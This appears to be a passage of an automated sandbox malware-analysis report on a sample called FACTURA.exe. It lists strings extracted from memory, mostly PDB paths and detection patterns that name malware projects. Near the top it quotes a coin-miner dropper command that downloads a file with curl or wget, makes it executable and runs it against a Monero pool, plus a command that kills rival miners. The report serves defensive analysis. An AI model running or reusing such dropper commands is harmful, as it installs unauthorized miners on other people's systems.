Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: XMR-Stak-CPU mining software, CPU Version.
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	String found in binary or memory: \nscpucnminer\img001.exe
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: grep"mine.moneropool.com"\|awk'{print$2}'\|xargskill-9psauxf\|grep-vgrep\|grep"xmr.crypto-pool.fr:8080
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	String found in binary or memory: \nscpucnminer\img001.exe
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: curl-fssl${url}/h2-o/tmp/avalonsaber\|\|wget-q${url}/h2-o/tmp/avalonsaber)&&chmod+x/tmp/avalonsabernohup/tmp/avalonsaber-opool.minexmr.com
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: XMRig 2.15.1-beta

Source: FACTURA.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source:	Binary string: \Release\runner.pdb source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp
Source:	Binary string: ASAM\original\delfiletype\delfiletype\obj\Release\delfiletype.pdb source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp
Source:	Binary string: Release\arc_2010.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.2881791538.00000000049A2000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.2962036020.00000000051D2000.00000004.00000040.sdmp
Source:	Binary string: \fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000024.00000003.6293096859.00000197A3151000.00000004.00000001.sdmp
Source:	Binary string: \natchat-master\x64\Release\natchat.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.2857096900.0000000005434000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2918404291.00000000030C0000.00000004.00000001.sdmp
Source:	Binary string: c:\1\rich\look\80\24\Famous\35\72\special\22\melody.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source:	Binary string: CFy92ROzKls\ro\HwtAF.pdb source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp
Source:	Binary string: -:\MySpys\chrome_cookie_view\Release\crome.pdb source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp
Source:	Binary string: cts\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp
Source:	Binary string: .C:\SlackDismort\third\Release\SlackDismort.pdbat source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source:	Binary string: *.pdb.\|!\binplace.exe source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp
Source:	Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdbxx source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: dciman32.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source:	Binary string: Release\NexGenMediaPlayerApp.pdb source: MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp
Source:	Binary string: msmdsrv.pdb source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp
Source:	Binary string: \BeamWinHTTP\Release\BeamWinHTTP.pdb source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\mshta\objfre\i386\mshta.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source:	Binary string: he#@1.Pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: heerhWHW#@1wHJnERbRW.Pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: LMIGuardianSvc.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source:	Binary string: +020202020202020202020202020202020202020.pdb source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp
Source:	Binary string: \Release\gogodele.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source:	Binary string: \\Desktop\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: N%Tray Me !.*\\Release\\Tray Me !\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: SpeedNewASK\Debug\spdfrmon.pdb source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp
Source:	Binary string: \bin\DownloaderExe.pdb source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp
Source:	Binary string: fastfat.pdbN source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source:	Binary string: wl-cmd\Release\dll1.pdb source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp
Source:	Binary string: \release\LSASecretsDump.pdb source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp
Source:	Binary string: PD:\projects\new_Clicker\SIV\original\daemon\NewClieckerDll\Release\SIVUpdate.pdb] source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp
Source:	Binary string: sctasks.pdbd source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\find\objfre\i386\find.pdb source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp
Source:	Binary string: ZUsers\Admin\Documents\Visual Studio 2015\Projects\Cryptor2.0 Simple\Release\Cryptor2.0.pdba source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp
Source:	Binary string: \WinCbt\Release\WinCbt.pdb source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp
Source:	Binary string: @C:\Users\AverageGoose\source\repos\GooseLab\Release\GooseLab.pdb source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source:	Binary string: usp10.pdb source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source:	Binary string: :b.ProgramISLNetworkStart_win32.0\Release\launch_normal.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source:	Binary string: g711codc.pdb3 source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source:	Binary string: reg.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source:	Binary string: Ransomware.pdbxN source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source:	Binary string: -GMGameStart\bin\release_static\GMUnPacker.pdba source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source:	Binary string: \SearchProtect\Bin\Release\ProtectService.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source:	Binary string: \x64\release\shell.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source:	Binary string: hWEHW#@HJERKJERJER^$.Pdb~ source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: mgr.pdb source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp
Source:	Binary string: \Release\ComBroadcaster.pdb source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp
Source:	Binary string: bot.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source:	Binary string: \\UniversalOrchestratorPrivEscPoc\\Release\\UniversalOrchestratorPrivEscPoc\.pdb source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source:	Binary string: .+:.*\\SkypeSpread.pdb source: MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp
Source:	Binary string: comp.pdbd source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp
Source:	Binary string: \Dolphin.pdb source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp
Source:	Binary string: c:\Documents and Settings\Administrator\My Documents\Visual Studio Projects\EASZZCDFR\Release\EASZZCDFR.pdb source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdbx source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp
Source:	Binary string: -C:\backward\inch\enumeration\Atmel\neces.pdb source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp
Source:	Binary string: Ivan\Documents\generic_exe\Release\BHO.pdb source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp
Source:	Binary string: \CCC\obj\Debug\CCC.pdb source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source:	Binary string: WhjrkehLkpe;rltjhpow;elkrjjklWEKL#.pdb] source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: EC:\Projects\Docwize\cUniFunctions\obj\DocwizeClient\cUniFunctions.pdbx source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp
Source:	Binary string: .+:\\src\\tcrypt\\Release\\s_(high\|low).pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source:	Binary string: c:\projects\cuspidPowershell\cuspid\EmbeddedDlls\AMSIFinder\AMSIFinder\obj\Release\AMSIFinder.pdb source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-io-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source:	Binary string: WanNengWB\WBUpd32.pdb source: MpSigStub.exe, 00000024.00000003.6319165087.00000197A48CC000.00000004.00000001.sdmp
Source:	Binary string: CryptoService.pdb source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp
Source:	Binary string: msasn1.pdb source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp
Source:	Binary string: ,\NetGuy_Explorer\Release\NetGuy_Explorer.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source:	Binary string: \TMain\Release\TSvr.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source:	Binary string: ,T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source:	Binary string: L%D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: \SearchProtect\bin\Release\HPNotify.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source:	Binary string: Bou3asba\obj\Release\Danao.pdb source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000005.00000003.2855689224.000000000292F000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962036020.00000000051D2000.00000004.00000040.sdmp
Source:	Binary string: c:\RPCInstall\Release\RPCInstall.pdb source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb0 source: WerFault.exe, 00000009.00000003.2962036020.00000000051D2000.00000004.00000040.sdmp
Source:	Binary string: Release DlpHook\Proxy.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source:	Binary string: $\SuperLight\release\MfcDllServer.pdba source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source:	Binary string: \Sample\Release\CNetworking.pdb source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp
Source:	Binary string: $\Season\Wife_low\531\Quart\table.pdb source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp
Source:	Binary string: 2Projects\VerifyAndLaunch\release\GCO Bootstrap.pdb source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp
Source:	Binary string: MC:\Users\wizzlabs\source\repos\ConsoleMap\ConsoleMap\obj\Release\Ehssassi.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source:	Binary string: \BypassUac\branches\Download\build\Release\service.pdb source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source:	Binary string: OC:\Users\hoogle168\Desktop\2008Projects\NewCoreCtrl08\Release\NewCoreCtrl08.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source:	Binary string: \CRP\Release\Mount.pdbaD source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source:	Binary string: :Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp
Source:	Binary string: \Release\MyEncrypter2.pdb source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source:	Binary string: 7h4qMQ1edvEOY+wQIOdVR_v.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: c:\dev\torntv\Release\TornTVApp.pdb source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp
Source:	Binary string: winlogon.PDB source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: K8MiniPage.pdbx source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp
Source:	Binary string: \RUNPCH\Release\GUO_CAU.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source:	Binary string: 0.pdb source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp
Source:	Binary string: \bundler\Production\bundler.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdbz~ source: WerFault.exe, 00000005.00000003.2881791538.00000000049A2000.00000004.00000040.sdmp
Source:	Binary string: api-ms-win-core-shlwapi-obsolete-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp
Source:	Binary string: D:\C++\AsusShellCode\Release\AsusShellCode.pdb source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp
Source:	Binary string: R,\\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdbx source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source:	Binary string: costura.injectordll.pdb source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp
Source:	Binary string: [H:\My Data\My Source Code\Microsoft Office 2010\AutoKMS\AutoKMS\obj\x86\Release\AutoKMS.pdb source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp
Source:	Binary string: mpengine.pdbOGPS source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source:	Binary string: A .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source:	Binary string: f:\project_2008\Fileman_candle_kgrid\Filebus\Bin\UpdateWindow.pdb source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp
Source:	Binary string: wRHWRH@4hjethwehgw.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source:	Binary string: unknowndll.pdba~ source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source:	Binary string: \fiDarSayebni.pdb source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp
Source:	Binary string: IperiusRDPClient.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source:	Binary string: %KMS Client\bin\Release\KMS Client.pdba} source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source:	Binary string: S\ccnet\Publish_Client\work\src\mainapp\Abacus.LaunchMail\bin\Release\LaunchMail.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\attrib\objfre\i386\attrib.pdbP& source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp
Source:	Binary string: wajam_goblin.pdb source: MpSigStub.exe, 00000024.00000003.6342578169.00000197A421C000.00000004.00000001.sdmp
Source:	Binary string: C:\SuccWare\SuccWare\obj\Debug\SuccWare.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source:	Binary string: \\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb( source: WerFault.exe, 00000005.00000003.2859654211.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2926621250.0000000006131000.00000004.00000001.sdmp
Source:	Binary string: joy.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source:	Binary string: d:\av\common_main.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\twunk_16\objchk\i386\twunk_16.pdb source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp
Source:	Binary string: MsiDatabaseMerge.pdb source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp
Source:	Binary string: WebBrowserPassView.pdb source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp
Source:	Binary string: msimg32.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source:	Binary string: E:\Work\SaveVid\Savevid-WS-Trunk\InstallCore\rbin\soffer.pdb source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp
Source:	Binary string: GCWYq1g.pdb source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp
Source:	Binary string: mfcsubs.pdb source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp
Source:	Binary string: Release\NtdsAudit.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: netsh.pdbj source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: mshta.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source:	Binary string: BTR.pdbGCTL source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source:	Binary string: PROZIPPER.pdb source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp
Source:	Binary string: D:\developement\projects\flood_load\Release\flood_load.pdb source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp
Source:	Binary string: sfxrar32\Release\sfxrar.pdbxB source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source:	Binary string: \\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000024.00000003.6298561221.00000197A4380000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdbz~ source: WerFault.exe, 00000005.00000003.2881791538.00000000049A2000.00000004.00000040.sdmp
Source:	Binary string: ddraw.pdb source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp
Source:	Binary string: GPDFDocument.pdb source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp
Source:	Binary string: wbadmin.pdb source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp
Source:	Binary string: *\ClientPlugin\obj\Release\ClientPlugin.pdb source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp
Source:	Binary string: Unite.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source:	Binary string: \Release\WCmouiTri.pdb] source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp
Source:	Binary string: \MailClient\Release\MailClient.pdb source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp
Source:	Binary string: :FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdbx source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp
Source:	Binary string: L%D:\\MyCode\\riot.?\\decryptor.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source:	Binary string: Flipopia.pdb source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp
Source:	Binary string: \Ozrenko\Documents\Work\Interstat2\Interstat2\Weather\Interstat.pdb source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp
Source:	Binary string: Downloads\notepad-master\Release\notepad.pdb source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp
Source:	Binary string: AdFind\Release\AdFind.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source:	Binary string: d:\young\swprojects\tdxin\bin\amd64\rtdxftex_amd64.pdb source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp
Source:	Binary string: nethtsrv.pdb source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp
Source:	Binary string: \Black Coding\RAT+BOT\WebServer 2.0\src\Release\WebServer.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source:	Binary string: S\\server\\V.\\Release\\PhantomNet.*\.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source:	Binary string: \PCHunter64.pdb source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp
Source:	Binary string: Release\toolbar_setup.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdbxc source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp
Source:	Binary string: rasautou.pdb source: MpSigStub.exe, 00000024.00000003.6279246359.00000197A4A35000.00000004.00000001.sdmp
Source:	Binary string: \obj\Release\PersistenceModule.pdb source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp
Source:	Binary string: ?ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdbac source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source:	Binary string: ?E:\hhu\TeamViewer_13.bjbj\BuildTarget\Release2017\tv_w32dll.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source:	Binary string: \i386\lanmandrv.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: \Release\corsar.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source:	Binary string: c:\divide\broad\Hole\DoThird.pdb source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp
Source:	Binary string: e:\updatecheck\UpdateCheck\release\UpdateCheck.pdb source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp
Source:	Binary string: XBundlerTlsHelper.pdb source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp
Source:	Binary string: UqxIkBeNYhKR.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source:	Binary string: e:\src\fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source:	Binary string: e:\builddata\Install\source\Min_Loader-BuildAndDeploy\Release\Loader_Resized.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: tdc.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source:	Binary string: mpg2splt.pdb source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp
Source:	Binary string: obj\Release\FlashPlayerApp.pdb source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp
Source:	Binary string: dxtrans.pdb source: MpSigStub.exe, 00000024.00000003.6270214588.00000197A4657000.00000004.00000001.sdmp
Source:	Binary string: c:\supply\trouble\Classwho.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source:	Binary string: \Microsoft Windows Search.pdb source: MpSigStub.exe, 00000024.00000003.6292407063.00000197A4EC4000.00000004.00000001.sdmp
Source:	Binary string: termsrv.pdb source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source:	Binary string: KF.+:\\Projects\\C#\\Sayad\\Source\\Client\\bin\\x86\\Debug\\Client.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source:	Binary string: AntiMalware_Pro.pdb source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp
Source:	Binary string: fc.pdb0 source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp
Source:	Binary string: \Gleaned\purecall\win32p6.pdb source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
